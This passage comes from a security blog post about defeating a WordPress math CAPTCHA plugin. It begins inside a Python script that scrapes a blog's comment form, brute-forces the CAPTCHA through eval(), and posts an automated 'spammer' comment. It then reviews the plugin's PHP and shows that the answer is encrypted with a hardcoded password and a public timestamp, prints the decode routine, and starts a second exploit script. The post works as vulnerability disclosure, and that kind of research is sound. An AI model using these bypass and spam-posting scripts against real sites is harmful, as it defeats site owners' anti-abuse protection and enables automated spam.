<span class="n">OPERATORS</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'+'</span><span class="p">:</span> <span class="s1">'+'</span><span class="p">,</span> <span class="s1">'−'</span><span class="p">:</span> <span class="s1">'-'</span><span class="p">,</span> <span class="s1">'×'</span><span class="p">:</span> <span class="s1">'*'</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">:</span> <span class="s1">'/'</span><span class="p">,</span> <span class="s1">'='</span><span class="p">:</span> <span class="s1">'='</span><span class="p">}</span>
<span class="k">def</span> <span class="nf">R</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">d</span><span class="p">):</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">d</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">value</span><span class="p">))</span>
<span class="c1"># If we can make a sum of the string, try it (For cases like "twenty four")</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">has_op</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'y'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">s</span><span class="p">:</span>
<span class="n">s</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="nb">sum</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span> <span class="k">if</span> <span class="n">n</span> <span class="ow">and</span> <span class="nb">int</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="ow">in</span> <span class="n">N</span><span class="o">.</span><span class="n">values</span><span class="p">()]))</span>
<span class="k">return</span> <span class="n">s</span>
<span class="c1"># Prevent bad words in eval() </span>
<span class="k">def</span> <span class="nf">whitelist</span><span class="p">(</span><span class="n">captcha</span><span class="p">):</span>
<span class="n">good</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">itertools</span><span class="o">.</span><span class="n">chain</span><span class="p">(</span><span class="n">N</span><span class="o">.</span><span class="n">keys</span><span class="p">(),</span> <span class="p">[</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">N</span><span class="o">.</span><span class="n">values</span><span class="p">()],</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">()))</span>
<span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">captcha</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">):</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">token</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">if</span> <span class="n">token</span> <span class="ow">and</span> <span class="n">token</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">good</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"I failed: [</span><span class="si">%s</span><span class="s2">]"</span> <span class="o">%</span> <span class="n">token</span><span class="p">)</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Better not.'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">captcha</span>
<span class="k">def</span> <span class="nf">has_op</span><span class="p">(</span><span class="n">expr</span><span class="p">):</span>
<span class="k">for</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">():</span>
<span class="k">if</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">expr</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">get_op</span><span class="p">(</span><span class="n">expr</span><span class="p">):</span>
<span class="k">for</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">():</span>
<span class="k">if</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">expr</span><span class="p">:</span>
<span class="k">return</span> <span class="n">o</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">solve</span><span class="p">(</span><span class="n">captcha</span><span class="p">):</span>
<span class="c1"># Some example captchas:</span>
<span class="c1"># '9 − = eight'</span>
<span class="c1"># '+ 3 = eight'</span>
<span class="c1"># '9 × one ='</span>
<span class="c1"># '× 8 = twenty four'</span>
<span class="c1"># We see: Simple mathematical expression consisting of two parts. Let's parse that.</span>
<span class="n">left</span><span class="p">,</span> <span class="n">equals</span><span class="p">,</span> <span class="n">right</span> <span class="o">=</span> <span class="n">captcha</span><span class="o">.</span><span class="n">partition</span><span class="p">(</span><span class="s1">'='</span><span class="p">)</span> <span class="c1"># Python is beautiful</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">left</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">left</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">right</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">right</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="n">left</span> <span class="o">=</span><span class="n">R</span><span class="p">(</span><span class="n">left</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span>
<span class="n">right</span> <span class="o">=</span> <span class="n">R</span><span class="p">(</span><span class="n">right</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span>
<span class="n">expr</span> <span class="o">=</span> <span class="p">[</span><span class="n">left</span><span class="p">,</span> <span class="n">right</span><span class="p">][</span><span class="n">has_op</span><span class="p">(</span><span class="n">right</span><span class="p">)]</span> <span class="c1"># expr is the part with the mathematical operator</span>
<span class="n">ll</span><span class="p">,</span> <span class="n">op</span><span class="p">,</span> <span class="n">rr</span> <span class="o">=</span> <span class="n">expr</span><span class="o">.</span><span class="n">partition</span><span class="p">(</span><span class="n">get_op</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">ll</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">ll</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">rr</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">rr</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="c1"># Reassemble</span>
<span class="n">X</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1"> == </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="s1">'</span><span class="si">%s</span><span class="s1"> </span><span class="si">%s</span><span class="s1"> </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="n">ll</span><span class="p">,</span> <span class="n">N</span><span class="p">),</span> <span class="n">OPERATORS</span><span class="p">[</span><span class="n">op</span><span class="p">],</span> <span class="n">R</span><span class="p">(</span><span class="n">rr</span><span class="p">,</span> <span class="n">N</span><span class="p">)),</span> <span class="p">[</span><span class="n">right</span><span class="p">,</span> <span class="n">left</span><span class="p">][</span><span class="n">expr</span><span class="o">==</span><span class="n">right</span><span class="p">])</span>
<span class="c1"># Brute force</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10000</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">eval</span><span class="p">(</span><span class="n">X</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'y'</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))):</span>
<span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># Obtain post parameters from comment form</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occured'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout'</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="c1"># Parse parameters and solve captcha</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">fromstring</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">))</span>
<span class="n">el</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'cptch_block'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">el</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="n">solution</span> <span class="o">=</span> <span class="n">solve</span><span class="p">(</span><span class="n">whitelist</span><span class="p">(</span><span class="n">captcha</span><span class="p">))</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_result'</span><span class="p">:</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_time'</span><span class="p">:</span>
<span class="n">time</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">el</span><span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'form-submit'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_post_ID'</span><span class="p">:</span>
<span class="n">post_id</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_parent'</span><span class="p">:</span>
<span class="n">comment_parent</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"[+] Solution of captcha '</span><span class="si">%s</span><span class="s2">' is </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">solution</span><span class="p">))</span>
<span class="c1"># No write a comment with the cracked captcha to proof that we provided the</span>
<span class="c1"># correct solution.</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'author'</span><span class="p">:</span> <span class="s1">'spammer'</span><span class="p">,</span> <span class="s1">'email'</span><span class="p">:</span> <span class="s1">'spammer@spamhouse.org'</span><span class="p">,</span> <span class="s1">'url'</span><span class="p">:</span> <span class="s1">'http://spamming.com'</span><span class="p">,</span>
<span class="s1">'cptch_result'</span><span class="p">:</span> <span class="n">result</span><span class="p">,</span> <span class="s1">'cptch_time'</span><span class="p">:</span> <span class="n">time</span><span class="p">,</span> <span class="s1">'cptch_number'</span><span class="p">:</span> <span class="n">solution</span><span class="p">,</span>
<span class="s1">'comment'</span><span class="p">:</span> <span class="s2">"Hi there! No protection from spammers!!!:D"</span><span class="p">,</span> <span class="s1">'submit'</span><span class="p">:</span> <span class="s1">'Post+Comment'</span><span class="p">,</span>
<span class="s1">'comment_post_ID'</span><span class="p">:</span> <span class="n">post_id</span><span class="p">,</span> <span class="s1">'comment_parent'</span><span class="p">:</span> <span class="n">comment_parent</span><span class="p">}</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">"http://incolumitas.com/wp-comments-post.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occured'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout'</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="k">if</span> <span class="s1">'''Error: You have entered an incorrect CAPTCHA value.'''</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] Captcha cracking was not successful'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Comment submitted'</span><span class="p">)</span>
</code></pre></div>
<p>That seems to work surprisingly well. Without even reading the code, the
captcha plugin is totally broken using the upper approach. The above
code simply parses every mathematical equation (The plugin always severs
equations) and assembles them to strings the feeds python built-in
eval(). We then iterate the expression from zero to 10000 and substitute
the for loop variable into the expression. If the math expression
becomes true, we found the variable and therefore the solution. Really
easy. Well the plugin is broken, that's proved, but I have this strange
insight that I might be on the track to reveal a twofold broken app :P
(It's 04:00 in the morning here, maybe that's why I am writing so
chesty)</p>
<h3>Whiteboxing - Code assessment</h3>
<p>Let's review the source code of the plugin.</p>
<p>You also want to have a glance on the code?
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.7/captcha.php" title="the code">Here</a>
you go.<br>
My very first impression was quite positive (Besides already knowing
that the plugin was useless :/). The author seems to posses a profound
understanding of the wordpress API, he uses lot's of hooks (filters and
actions) and structures the code on the first glimpse very nicely. I
know from own experience that writing code for wordpress is not always
easy. But let's look at the critical part. The captcha is generated by
the function cptch_display_captcha_custom(). For your convenience, I
will list it here:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Functionality of the captcha logic work for custom form</span>
<span class="x">if ( ! function_exists( 'cptch_display_captcha_custom' ) ) {</span>
<span class="x"> function cptch_display_captcha_custom() {</span>
<span class="x"> global $cptch_options, $str_key, $cptch_time;</span>
<span class="x"> $content = "";</span>
<span class="x"> // In letters presentation of numbers 0-9</span>
<span class="x"> $number_string = array(); </span>
<span class="x"> $number_string[0] = __( 'zero', 'captcha' );</span>
<span class="x"> $number_string[1] = __( 'one', 'captcha' );</span>
<span class="x"> $number_string[2] = __( 'two', 'captcha' );</span>
<span class="x"> $number_string[3] = __( 'three', 'captcha' );</span>
<span class="x"> $number_string[4] = __( 'four', 'captcha' );</span>
<span class="x"> $number_string[5] = __( 'five', 'captcha' );</span>
<span class="x"> $number_string[6] = __( 'six', 'captcha' );</span>
<span class="x"> $number_string[7] = __( 'seven', 'captcha' );</span>
<span class="x"> $number_string[8] = __( 'eight', 'captcha' );</span>
<span class="x"> $number_string[9] = __( 'nine', 'captcha' ); </span>
<span class="x"> // In letters presentation of numbers 11 -19</span>
<span class="x"> $number_two_string = array();</span>
<span class="x"> $number_two_string[1] = __( 'eleven', 'captcha' );</span>
<span class="x"> $number_two_string[2] = __( 'twelve', 'captcha' );</span>
<span class="x"> $number_two_string[3] = __( 'thirteen', 'captcha' );</span>
<span class="x"> $number_two_string[4] = __( 'fourteen', 'captcha' );</span>
<span class="x"> $number_two_string[5] = __( 'fifteen', 'captcha' );</span>
<span class="x"> $number_two_string[6] = __( 'sixteen', 'captcha' );</span>
<span class="x"> $number_two_string[7] = __( 'seventeen', 'captcha' );</span>
<span class="x"> $number_two_string[8] = __( 'eighteen', 'captcha' );</span>
<span class="x"> $number_two_string[9] = __( 'nineteen', 'captcha' );</span>
<span class="x"> // In letters presentation of numbers 10, 20, 30, 40, 50, 60, 70, 80, 90</span>
<span class="x"> $number_three_string = array();</span>
<span class="x"> $number_three_string[1] = __( 'ten', 'captcha' );</span>
<span class="x"> $number_three_string[2] = __( 'twenty', 'captcha' );</span>
<span class="x"> $number_three_string[3] = __( 'thirty', 'captcha' );</span>
<span class="x"> $number_three_string[4] = __( 'forty', 'captcha' );</span>
<span class="x"> $number_three_string[5] = __( 'fifty', 'captcha' );</span>
<span class="x"> $number_three_string[6] = __( 'sixty', 'captcha' );</span>
<span class="x"> $number_three_string[7] = __( 'seventy', 'captcha' );</span>
<span class="x"> $number_three_string[8] = __( 'eighty', 'captcha' );</span>
<span class="x"> $number_three_string[9] = __( 'ninety', 'captcha' );</span>
<span class="x"> // The array of math actions</span>
<span class="x"> $math_actions = array();</span>
<span class="x"> // If value for Plus on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_plus'] )</span>
<span class="x"> $math_actions[] = '+';</span>
<span class="x"> // If value for Minus on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_minus'] )</span>
<span class="x"> $math_actions[] = '−';</span>
<span class="x"> // If value for Increase on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_increase'] )</span>
<span class="x"> $math_actions[] = '×';</span>
<span class="x"> // Which field from three will be the input to enter required value</span>
<span class="x"> $rand_input = rand( 0, 2 );</span>
<span class="x"> // Which field from three will be the letters presentation of numbers</span>
<span class="x"> $rand_number_string = rand( 0, 2 );</span>
<span class="x"> // If don't check Word in setting page - $rand_number_string not display</span>
<span class="x"> if( 0 == $cptch_options["cptch_difficulty_word"])</span>
<span class="x"> $rand_number_string = -1;</span>
<span class="x"> // Set value for $rand_number_string while $rand_input = $rand_number_string</span>
<span class="x"> while($rand_input == $rand_number_string) {</span>
<span class="x"> $rand_number_string = rand( 0, 2 );</span>
<span class="x"> }</span>
<span class="x"> // What is math action to display in the form</span>
<span class="x"> $rand_math_action = rand( 0, count($math_actions) - 1 );</span>
<span class="x"> $array_math_expretion = array();</span>
<span class="x"> // Add first part of mathematical expression</span>
<span class="x"> $array_math_expretion[0] = rand( 1, 9 );</span>
<span class="x"> // Add second part of mathematical expression</span>
<span class="x"> $array_math_expretion[1] = rand( 1, 9 );</span>
<span class="x"> // Calculation of the mathematical expression result</span>
<span class="x"> switch( $math_actions[$rand_math_action] ) {</span>
<span class="x"> case "+":</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] + $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> case "−":</span>
<span class="x"> // Result must not be equal to the negative number</span>
<span class="x"> if($array_math_expretion[0] < $array_math_expretion[1]) {</span>
<span class="x"> $number = $array_math_expretion[0];</span>
<span class="x"> $array_math_expretion[0] = $array_math_expretion[1];</span>
<span class="x"> $array_math_expretion[1] = $number;</span>
<span class="x"> }</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] - $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> case "×":</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] * $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> }</span>
<span class="x"> // String for display</span>
<span class="x"> $str_math_expretion = "";</span>
<span class="x"> // First part of mathematical expression</span>
<span class="x"> if( 0 == $rand_input )</span>
<span class="x"> $str_math_expretion .= "";</span>
<span class="x"> else if ( 0 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] )</span>
<span class="x"> $str_math_expretion .= $number_string[$array_math_expretion[0]];</span>
<span class="x"> else</span>
<span class="x"> $str_math_expretion .= $array_math_expretion[0];</span>
<span class="x"> // Add math action</span>
<span class="x"> $str_math_expretion .= " ".$math_actions[$rand_math_action];</span>
<span class="x"> // Second part of mathematical expression</span>
<span class="x"> if( 1 == $rand_input )</span>
<span class="x"> $str_math_expretion .= " ";</span>
<span class="x"> else if ( 1 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] )</span>
<span class="x"> $str_math_expretion .= " ". $number_string[$array_math_expretion[1]];</span>
<span class="x"> else</span>
<span class="x"> $str_math_expretion .= " ".$array_math_expretion[1];</span>
<span class="x"> // Add =</span>
<span class="x"> $str_math_expretion .= " = ";</span>
<span class="x"> // Add result of mathematical expression</span>
<span class="x"> if( 2 == $rand_input ) {</span>
<span class="x"> $str_math_expretion .= " ";</span>
<span class="x"> } else if ( 2 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] ) {</span>
<span class="x"> if( $array_math_expretion[2] < 10 )</span>
<span class="x"> $str_math_expretion .= " ". $number_string[$array_math_expretion[2]];</span>
<span class="x"> else if( $array_math_expretion[2] < 20 && $array_math_expretion[2] > 10 )</span>
<span class="x"> $str_math_expretion .= " ". $number_two_string[ $array_math_expretion[2] % 10 ];</span>
<span class="x"> else {</span>
<span class="x"> if ( get_bloginfo( 'language','Display' ) == "nl-NL" ) {</span>
<span class="x"> $str_math_expretion .= " ".( 0 != $array_math_expretion[2] % 10 ? $number_string[ $array_math_expretion[2] % 10 ] . __( "and", 'captcha' ) : '' ) . $number_three_string[ $array_math_expretion[2] / 10 ];</span>
<span class="x"> } else {</span>
<span class="x"> $str_math_expretion .= " " . $number_three_string[ $array_math_expretion[2] / 10 ]." ".( 0 != $array_math_expretion[2] % 10 ? $number_string[ $array_math_expretion[2] % 10 ] : '');</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> } else {</span>
<span class="x"> $str_math_expretion .= $array_math_expretion[2];</span>
<span class="x"> }</span>
<span class="x"> // Add hidden field with encoding result</span>
<span class="x"> $content .= '</span>
<span class="x"> ';</span>
<span class="x"> $content .= $str_math_expretion; </span>
<span class="x"> return $content;</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>What can we see on the first view? The author declares several arrays
holding integer strings on a rather painful way. He then continues to
build the maths equation captcha with a variable called
<code>$array_math_expretion</code> (Introduced on line 68). I am pretty sure he
means <code>$array_math_expression</code>. But shit happens. I mean the plugin
is only 2.5 years old and in the very early version 3.8.7. Who cares
about grammar anyways?</p>
<p>Lot's of hard understandable code follows. Some random integers are
obtained to built the fancy <em>expretion</em>. And, wait, what's that on line
80?!</p>
<div class="highlight"><pre><span></span><code><span class="x">// Result must not be equal to the negative number</span>
<span class="x">if($array_math_expretion[0] < $array_math_expretion[1]) {</span>
<span class="x"> $number = $array_math_expretion[0];</span>
<span class="x"> $array_math_expretion[0] = $array_math_expretion[1];</span>
<span class="x"> $array_math_expretion[1] = $number;</span>
<span class="x">}</span>
</code></pre></div>
<p>The author prevents the subtraction to become negative on a cumbersome
way. Really?! Is the missing associative property that hard to work
around?</p>
<p>Well let's go further. I really don't care how exactly the mathematical
expression is built, I just know that it infinitely sucks.</p>
<p>Consider the final lines 135 to 140. There the captcha answer is
<em>encoded</em> and then injected into the form where the user has to enter
the captcha. Normally injecting encrypted hidden input fields is a
common technique among web developers. But only under the supposition
that the hidden field values are properly encrypted. Let's see if the
author did so. That being said we have a look at the function encode():</p>
<div class="highlight"><pre><span></span><code><span class="x">// Function for encodinf number</span>
<span class="x">if ( ! function_exists( 'encode' ) ) {</span>
<span class="x"> function encode( $String, $Password, $cptch_time ) {</span>
<span class="x"> // Check if key for encoding is empty</span>
<span class="x"> if ( ! $Password ) die ( __( "Encryption password is not set", 'captcha' ) );</span>
<span class="x"> $Salt = md5( $cptch_time, true );</span>
<span class="x"> $String = substr( pack( "H*", sha1( $String ) ), 0, 1 ).$String;</span>
<span class="x"> $StrLen = strlen( $String );</span>
<span class="x"> $Seq = $Password;</span>
<span class="x"> $Gamma = '';</span>
<span class="x"> while ( strlen( $Gamma ) < $StrLen ) {</span>
<span class="x"> $Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );</span>
<span class="x"> $Gamma.=substr( $Seq, 0, 8 );</span>
<span class="x"> }</span>
<span class="x"> return base64_encode( $String ^ $Gamma );</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Again, before I even would dig deeper into the encoding function, I want
to know how it is called. Maybe the input parameters are predictable. Oh
boy, they are. The encoding function on line 136 in the previous code
snippet is called with two global variables, a timestamp and a
<em>password</em>, as well as the captcha expression string:</p>
<div class="highlight"><pre><span></span><code><span class="x">$str_key //the password</span>
<span class="x">$cptch_time // the timestamp</span>
</code></pre></div>
<p>These variables (the freaking password!) are initialized at the
beginning of the plugin to the following values:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Add global setting for Captcha</span>
<span class="x">global $wpmu, $str_key, $cptch_time;</span>
<span class="x">$str_key = "bws_3110013";</span>
<span class="x">$cptch_time = time();</span>
</code></pre></div>
<p>Well, what does that mean?</p>
<p>Whenever a captcha is generated, the captcha answer is <em>encrypted</em> with
a fully exposed password (<em>bws_3110013</em>) and a known timestamp (The
timestamp is known because it is also sent as hidden field in the form).
That means we can just apply the decode() function on the hidden values
whenever we fill out a form and can thus calculate the captcha answer
ourselves with the hidden input parameters! BOOM, captcha solved without
even applying OCR techniques (As far as parsing theses simple equations
counts as OCR).</p>
<p>Here for completeness sake the decode() function (I honestly cannot say
whether the encryption level is good, because I don't have profound
knowledge of cryptography, but it does look very weak to me. Could you
elaborate on it? Leave me a comment :P):</p>
<div class="highlight"><pre><span></span><code><span class="x">// Function for decoding number</span>
<span class="x">if ( ! function_exists( 'decode' ) ) {</span>
<span class="x"> function decode( $String, $Key, $cptch_time ) {</span>
<span class="x"> // Check if key for encoding is empty</span>
<span class="x"> if ( ! $Key ) die ( __( "Decryption password is not set", 'captcha' ) );</span>
<span class="x"> $Salt = md5( $cptch_time, true );</span>
<span class="x"> $StrLen = strlen( $String );</span>
<span class="x"> $Seq = $Key;</span>
<span class="x"> $Gamma = '';</span>
<span class="x"> while ( strlen( $Gamma ) < $StrLen ) {</span>
<span class="x"> $Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );</span>
<span class="x"> $Gamma.= substr( $Seq, 0, 8 );</span>
<span class="x"> }</span>
<span class="x"> $String = base64_decode( $String );</span>
<span class="x"> $String = $String^$Gamma;</span>
<span class="x"> $DecodedString = substr( $String, 1 );</span>
<span class="x"> $Error = ord( substr( $String, 0, 1 ) ^ substr( pack( "H*", sha1( $DecodedString ) ), 0, 1 ));</span>
<span class="x"> if ( $Error ) </span>
<span class="x"> return false;</span>
<span class="x"> else </span>
<span class="x"> return $DecodedString;</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>I should prove my above allegations? I will terminate my experiments
soon and then I'll post a exploitation of this weakness written in
Python. I will also add this POC on my github account. But for now the
explanation above will suffice.</p>
<p><strong>Edit: As promised, here is the code that reverses the decode
function:</strong></p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="c1"># A blog post site that needs to have the plugin http://wordpress.org/plugins/captcha/ enabled and </span>
<span class="c1"># should have a open comment form. This 'attack' works on every form that the plugin supports [E.g. registration,</span>
<span class="c1"># login, ...]. This renders the captcha completely useless.</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 07.11.2013</span>
<span class="c1"># tested on my local lamp with version 3.8.7</span>
<span class="n">TARGET</span> <span class="o">=</span> <span class="s2">"http://localhost/~nikolai/wordpress/?p=1"</span> <span class="c1"># The landing site.</span>
